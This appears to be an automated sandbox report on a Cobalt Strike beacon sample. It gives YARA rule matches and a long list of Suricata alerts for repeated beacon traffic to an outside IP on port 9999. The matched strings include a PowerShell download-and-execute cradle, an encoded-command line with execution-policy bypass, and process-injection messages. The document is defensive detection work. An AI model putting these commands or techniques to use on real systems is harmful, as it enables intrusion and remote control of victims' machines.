0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2ff3b:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2ff85:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2fd5e:$x3: %d is an x86 process (can't inject x64 content) 0x2f716:$s1: Could not open process token: %d (%u) 0x2f430:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f7d9:$s4: Could not connect to pipe (%s): %d
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x31c3e:$loader_export: ReflectiveLoader 0x31c32:$exportname: beacon.dll
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2fd2e:$x2: %d is an x64 process (can't inject x86 content) 0x30076:$x3: Failed to impersonate logged on user %d (%u) 0x2ff85:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2ff3b:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2f69c:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2fc95:$s4: could not write to process memory: %d 0x2f430:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f7d9:$s6: Could not connect to pipe (%s): %d
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x30408:$str1: %s (admin) 0x31c32:$str2: beacon.dll
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2ff85:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2fd5e:$x2: %d is an x86 process (can't inject x64 content) 0x2ff3b:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x3001f:$x4: Failed to impersonate token from %d (%u) 0x30076:$x5: Failed to impersonate logged on user %d (%u) 0x2f430:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x31c3d:$s1: _ReflectiveLoader@ 0x31c3e:$s2: ReflectiveLoader@
0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2ff13:$s1: %%IMPORT%% 0x2f414:$s2: www6.%x%x.%s 0x2f408:$s3: cdn.%x%x.%s 0x2f690:$s4: api.%x%x.%s 0x30408:$s5: %s (admin) 0x2f6ff:$s6: could not spawn %s: %d 0x2ffb7:$s7: Could not kill %d: %d 0x2f7d9:$s8: Could not connect to pipe (%s): %d 0x2f421:$s9: %s.1%x.%x%x.%s 0x2f430:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f4a8:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f50b:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f551:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f58f:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2f5c5:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f5ee:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2f613:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2f634:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2f651:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2f66a:$s9: %s.1%08x%08x.%x%x.%s 0x2f67f:$s9: %s.1%08x.%x%x.%s
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	JoeSecurity_CobaltStrike	Yara detected CobaltStrike	Joe Security
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	JoeSecurity_CobaltStrike_3	Yara detected CobaltStrike	Joe Security
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	Windows_Trojan_CobaltStrike_ee756db7	Attempts to detect Cobalt Strike based on strings found in BEACON	unknown	0x2dc30:$a1: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dca8:$a2: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2e412:$a3: ppid %d is in a different desktop session (spawned jobs may fail). Use 'ppid' to reset. 0x2e73b:$a4: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2e6cd:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2e73b:$a5: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/') 0x2dd0b:$a6: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2de9c:$a7: could not run command (w/ token) because of its length of %d bytes! 0x2dd51:$a8: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dd8f:$a9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2e785:$a10: powershell -nop -exec bypass -EncodedCommand "%s" 0x2dffc:$a11: Could not open service control manager on %s: %d 0x2e52e:$a12: %d is an x64 process (can't inject x86 content) 0x2e55e:$a13: %d is an x86 process (can't inject x64 content) 0x2e876:$a14: Failed to impersonate logged on user %d (%u) 0x2e4e7:$a15: could not create remote thread in %d: %d 0x2ddc5:$a16: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2e495:$a17: could not write to process memory: %d 0x2e02d:$a18: Could not create service %s on %s: %d 0x2e0b6:$a19: Could not delete service %s on %s: %d 0x2df16:$a20: Could not open process token: %d (%u)
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	Windows_Trojan_CobaltStrike_f0b627fc	Rule for beacon reflective loader	unknown	0x87f3:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 0x9493:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	Windows_Trojan_Metasploit_7bc0f998	Identifies the API address lookup function leverage by metasploit shellcode	unknown	0x32687:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	Windows_Trojan_Metasploit_c9773203	Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.	unknown	0x326f3:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	Beacon_K5om	Detects Meterpreter Beacon - file K5om.dll	Florian Roth	0x2e73b:$x1: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2e785:$x2: powershell -nop -exec bypass -EncodedCommand "%s" 0x2e55e:$x3: %d is an x86 process (can't inject x64 content) 0x2df16:$s1: Could not open process token: %d (%u) 0x2dc30:$s3: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dfd9:$s4: Could not connect to pipe (%s): %d
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	CobaltStrike_Unmodifed_Beacon	Detects unmodified CobaltStrike beacon DLL	yara@s3c.za.net	0x3043e:$loader_export: ReflectiveLoader 0x30432:$exportname: beacon.dll
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	Leviathan_CobaltStrike_Sample_1	Detects Cobalt Strike sample from Leviathan report	Florian Roth	0x2e52e:$x2: %d is an x64 process (can't inject x86 content) 0x2e876:$x3: Failed to impersonate logged on user %d (%u) 0x2e785:$s1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2e73b:$s2: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2de9c:$s3: could not run command (w/ token) because of its length of %d bytes! 0x2e495:$s4: could not write to process memory: %d 0x2dc30:$s5: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dfd9:$s6: Could not connect to pipe (%s): %d
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	crime_win32_csbeacon_1	Detects Cobalt Strike loader	@VK_Intel	0x2ec08:$str1: %s (admin) 0x30432:$str2: beacon.dll
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	WiltedTulip_ReflectiveLoader	Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip	Florian Roth	0x2e785:$x1: powershell -nop -exec bypass -EncodedCommand "%s" 0x2e55e:$x2: %d is an x86 process (can't inject x64 content) 0x2e73b:$x3: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s 0x2e81f:$x4: Failed to impersonate token from %d (%u) 0x2e876:$x5: Failed to impersonate logged on user %d (%u) 0x2dc30:$x6: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0x3043d:$s1: _ReflectiveLoader@ 0x3043e:$s2: ReflectiveLoader@
0.2.vNenBbeRFZ.exe.3d70000.1.unpack	MALWARE_Win_CobaltStrike	CobaltStrike payload	ditekSHen	0x2e713:$s1: %%IMPORT%% 0x2dc14:$s2: www6.%x%x.%s 0x2dc08:$s3: cdn.%x%x.%s 0x2de90:$s4: api.%x%x.%s 0x2ec08:$s5: %s (admin) 0x2deff:$s6: could not spawn %s: %d 0x2e7b7:$s7: Could not kill %d: %d 0x2dfd9:$s8: Could not connect to pipe (%s): %d 0x2dc21:$s9: %s.1%x.%x%x.%s 0x2dc30:$s9: %s.4%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dca8:$s9: %s.3%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dd0b:$s9: %s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dd51:$s9: %s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2dd8f:$s9: %s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s 0x2ddc5:$s9: %s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2ddee:$s9: %s.1%08x%08x%08x%08x%08x%08x.%x%x.%s 0x2de13:$s9: %s.1%08x%08x%08x%08x%08x.%x%x.%s 0x2de34:$s9: %s.1%08x%08x%08x%08x.%x%x.%s 0x2de51:$s9: %s.1%08x%08x%08x.%x%x.%s 0x2de6a:$s9: %s.1%08x%08x.%x%x.%s 0x2de7f:$s9: %s.1%08x.%x%x.%s
Click to see the 23 entries

Suricata Signatures

ET MALWARE Cobalt Strike Beacon Observed

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T04:19:04.968088+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49731	47.239.242.141	9999	TCP
2024-10-08T04:19:05.972057+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49732	47.239.242.141	9999	TCP
2024-10-08T04:19:06.998484+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49733	47.239.242.141	9999	TCP
2024-10-08T04:19:08.053189+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49734	47.239.242.141	9999	TCP
2024-10-08T04:19:09.108824+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49735	47.239.242.141	9999	TCP
2024-10-08T04:19:10.121197+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49736	47.239.242.141	9999	TCP
2024-10-08T04:19:11.127428+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49737	47.239.242.141	9999	TCP
2024-10-08T04:19:12.179763+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49738	47.239.242.141	9999	TCP
2024-10-08T04:19:13.204933+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49739	47.239.242.141	9999	TCP
2024-10-08T04:19:14.236431+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49740	47.239.242.141	9999	TCP
2024-10-08T04:19:15.280380+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49741	47.239.242.141	9999	TCP
2024-10-08T04:19:16.312929+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49742	47.239.242.141	9999	TCP
2024-10-08T04:19:17.340971+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49743	47.239.242.141	9999	TCP
2024-10-08T04:19:18.389586+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49744	47.239.242.141	9999	TCP
2024-10-08T04:19:19.415869+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49746	47.239.242.141	9999	TCP
2024-10-08T04:19:20.459124+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49750	47.239.242.141	9999	TCP
2024-10-08T04:19:21.516151+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	49752	47.239.242.141	9999	TCP
2024-10-08T04:19:22.527862+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57241	47.239.242.141	9999	TCP
2024-10-08T04:19:23.611069+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57242	47.239.242.141	9999	TCP
2024-10-08T04:19:24.657533+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57243	47.239.242.141	9999	TCP
2024-10-08T04:19:25.698644+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57244	47.239.242.141	9999	TCP
2024-10-08T04:19:26.867039+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57245	47.239.242.141	9999	TCP
2024-10-08T04:19:27.898211+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57246	47.239.242.141	9999	TCP
2024-10-08T04:19:28.940254+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57247	47.239.242.141	9999	TCP
2024-10-08T04:19:29.987916+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57248	47.239.242.141	9999	TCP
2024-10-08T04:19:31.005395+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57249	47.239.242.141	9999	TCP
2024-10-08T04:19:32.006805+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57250	47.239.242.141	9999	TCP
2024-10-08T04:19:33.047421+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57251	47.239.242.141	9999	TCP
2024-10-08T04:19:34.088439+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57252	47.239.242.141	9999	TCP
2024-10-08T04:19:35.109959+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57253	47.239.242.141	9999	TCP
2024-10-08T04:19:36.140969+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57254	47.239.242.141	9999	TCP
2024-10-08T04:19:37.156592+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57255	47.239.242.141	9999	TCP
2024-10-08T04:19:38.202974+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57256	47.239.242.141	9999	TCP
2024-10-08T04:19:39.233093+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57257	47.239.242.141	9999	TCP
2024-10-08T04:19:40.274977+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57258	47.239.242.141	9999	TCP
2024-10-08T04:19:41.305449+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57259	47.239.242.141	9999	TCP
2024-10-08T04:19:42.327506+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57260	47.239.242.141	9999	TCP
2024-10-08T04:19:43.399661+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57261	47.239.242.141	9999	TCP
2024-10-08T04:19:44.409634+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57262	47.239.242.141	9999	TCP
2024-10-08T04:19:45.456892+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57263	47.239.242.141	9999	TCP
2024-10-08T04:19:46.457545+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57264	47.239.242.141	9999	TCP
2024-10-08T04:19:47.476754+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	57265	47.239.242.141	9999	TCP
2024-10-08T04:19:48.500123+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54000	47.239.242.141	9999	TCP
2024-10-08T04:19:49.531755+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54001	47.239.242.141	9999	TCP
2024-10-08T04:19:50.589170+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54002	47.239.242.141	9999	TCP
2024-10-08T04:19:51.620832+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54003	47.239.242.141	9999	TCP
2024-10-08T04:19:52.660561+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54004	47.239.242.141	9999	TCP
2024-10-08T04:19:53.691905+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54005	47.239.242.141	9999	TCP
2024-10-08T04:19:54.732434+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54006	47.239.242.141	9999	TCP
2024-10-08T04:19:55.886326+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54007	47.239.242.141	9999	TCP
2024-10-08T04:19:56.918012+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54008	47.239.242.141	9999	TCP
2024-10-08T04:19:57.940654+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54009	47.239.242.141	9999	TCP
2024-10-08T04:19:58.943230+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54011	47.239.242.141	9999	TCP
2024-10-08T04:19:59.951013+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54012	47.239.242.141	9999	TCP
2024-10-08T04:20:01.004859+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54022	47.239.242.141	9999	TCP
2024-10-08T04:20:02.013597+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54029	47.239.242.141	9999	TCP
2024-10-08T04:20:03.043271+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54035	47.239.242.141	9999	TCP
2024-10-08T04:20:04.062120+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54046	47.239.242.141	9999	TCP
2024-10-08T04:20:05.105700+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54052	47.239.242.141	9999	TCP
2024-10-08T04:20:06.144595+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54058	47.239.242.141	9999	TCP
2024-10-08T04:20:07.187408+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54067	47.239.242.141	9999	TCP
2024-10-08T04:20:08.438710+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54075	47.239.242.141	9999	TCP
2024-10-08T04:20:09.488923+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54076	47.239.242.141	9999	TCP
2024-10-08T04:20:10.501748+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54087	47.239.242.141	9999	TCP
2024-10-08T04:20:11.547390+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54093	47.239.242.141	9999	TCP
2024-10-08T04:20:12.550985+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54099	47.239.242.141	9999	TCP
2024-10-08T04:20:13.596335+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54110	47.239.242.141	9999	TCP
2024-10-08T04:20:14.642143+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54116	47.239.242.141	9999	TCP
2024-10-08T04:20:15.650787+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54123	47.239.242.141	9999	TCP
2024-10-08T04:20:16.697041+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54132	47.239.242.141	9999	TCP
2024-10-08T04:20:17.715528+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54137	47.239.242.141	9999	TCP
2024-10-08T04:20:18.743830+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54141	47.239.242.141	9999	TCP
2024-10-08T04:20:19.807840+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54147	47.239.242.141	9999	TCP
2024-10-08T04:20:20.837022+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54151	47.239.242.141	9999	TCP
2024-10-08T04:20:21.896606+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54157	47.239.242.141	9999	TCP
2024-10-08T04:20:22.942607+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54167	47.239.242.141	9999	TCP
2024-10-08T04:20:23.970751+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54174	47.239.242.141	9999	TCP
2024-10-08T04:20:25.002018+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54180	47.239.242.141	9999	TCP
2024-10-08T04:20:26.025783+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54190	47.239.242.141	9999	TCP
2024-10-08T04:20:27.038896+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54197	47.239.242.141	9999	TCP
2024-10-08T04:20:28.096113+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54203	47.239.242.141	9999	TCP
2024-10-08T04:20:29.113685+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54209	47.239.242.141	9999	TCP
2024-10-08T04:20:30.151408+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54220	47.239.242.141	9999	TCP
2024-10-08T04:20:31.172357+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54226	47.239.242.141	9999	TCP
2024-10-08T04:20:33.033516+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54235	47.239.242.141	9999	TCP
2024-10-08T04:20:34.066251+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54241	47.239.242.141	9999	TCP
2024-10-08T04:20:35.119688+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54249	47.239.242.141	9999	TCP
2024-10-08T04:20:36.157631+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54255	47.239.242.141	9999	TCP
2024-10-08T04:20:37.249000+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54264	47.239.242.141	9999	TCP
2024-10-08T04:20:38.252660+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54271	47.239.242.141	9999	TCP
2024-10-08T04:20:39.286417+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54278	47.239.242.141	9999	TCP
2024-10-08T04:20:40.310462+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54287	47.239.242.141	9999	TCP
2024-10-08T04:20:41.338962+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54295	47.239.242.141	9999	TCP
2024-10-08T04:20:42.353769+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54301	47.239.242.141	9999	TCP
2024-10-08T04:20:43.404768+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54310	47.239.242.141	9999	TCP
2024-10-08T04:20:44.438145+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54318	47.239.242.141	9999	TCP
2024-10-08T04:20:45.498910+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54319	47.239.242.141	9999	TCP
2024-10-08T04:20:46.553987+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54320	47.239.242.141	9999	TCP
2024-10-08T04:20:47.566853+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54321	47.239.242.141	9999	TCP
2024-10-08T04:20:48.571227+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54322	47.239.242.141	9999	TCP
2024-10-08T04:20:49.617059+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54323	47.239.242.141	9999	TCP
2024-10-08T04:20:50.690784+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54324	47.239.242.141	9999	TCP
2024-10-08T04:20:51.704868+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54325	47.239.242.141	9999	TCP
2024-10-08T04:20:52.709000+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54326	47.239.242.141	9999	TCP
2024-10-08T04:20:53.737040+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54327	47.239.242.141	9999	TCP
2024-10-08T04:20:54.761899+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54328	47.239.242.141	9999	TCP
2024-10-08T04:20:55.800991+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54329	47.239.242.141	9999	TCP
2024-10-08T04:20:57.012911+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54330	47.239.242.141	9999	TCP
2024-10-08T04:20:58.043260+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54331	47.239.242.141	9999	TCP
2024-10-08T04:20:59.053608+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54332	47.239.242.141	9999	TCP
2024-10-08T04:21:00.072083+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54333	47.239.242.141	9999	TCP
2024-10-08T04:21:01.117037+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54334	47.239.242.141	9999	TCP
2024-10-08T04:21:02.144689+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54335	47.239.242.141	9999	TCP
2024-10-08T04:21:03.188730+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54336	47.239.242.141	9999	TCP
2024-10-08T04:21:04.204429+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54337	47.239.242.141	9999	TCP
2024-10-08T04:21:05.214067+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54338	47.239.242.141	9999	TCP
2024-10-08T04:21:06.269961+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54339	47.239.242.141	9999	TCP
2024-10-08T04:21:07.377059+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54340	47.239.242.141	9999	TCP
2024-10-08T04:21:08.433504+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54341	47.239.242.141	9999	TCP
2024-10-08T04:21:09.477067+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54342	47.239.242.141	9999	TCP
2024-10-08T04:21:10.516090+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54343	47.239.242.141	9999	TCP
2024-10-08T04:21:11.516757+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54344	47.239.242.141	9999	TCP
2024-10-08T04:21:12.546302+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54345	47.239.242.141	9999	TCP
2024-10-08T04:21:13.561153+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54346	47.239.242.141	9999	TCP
2024-10-08T04:21:14.570458+0200	2033713	1	Targeted Malicious Activity was Detected	192.168.2.4	54347	47.239.242.141	9999	TCP
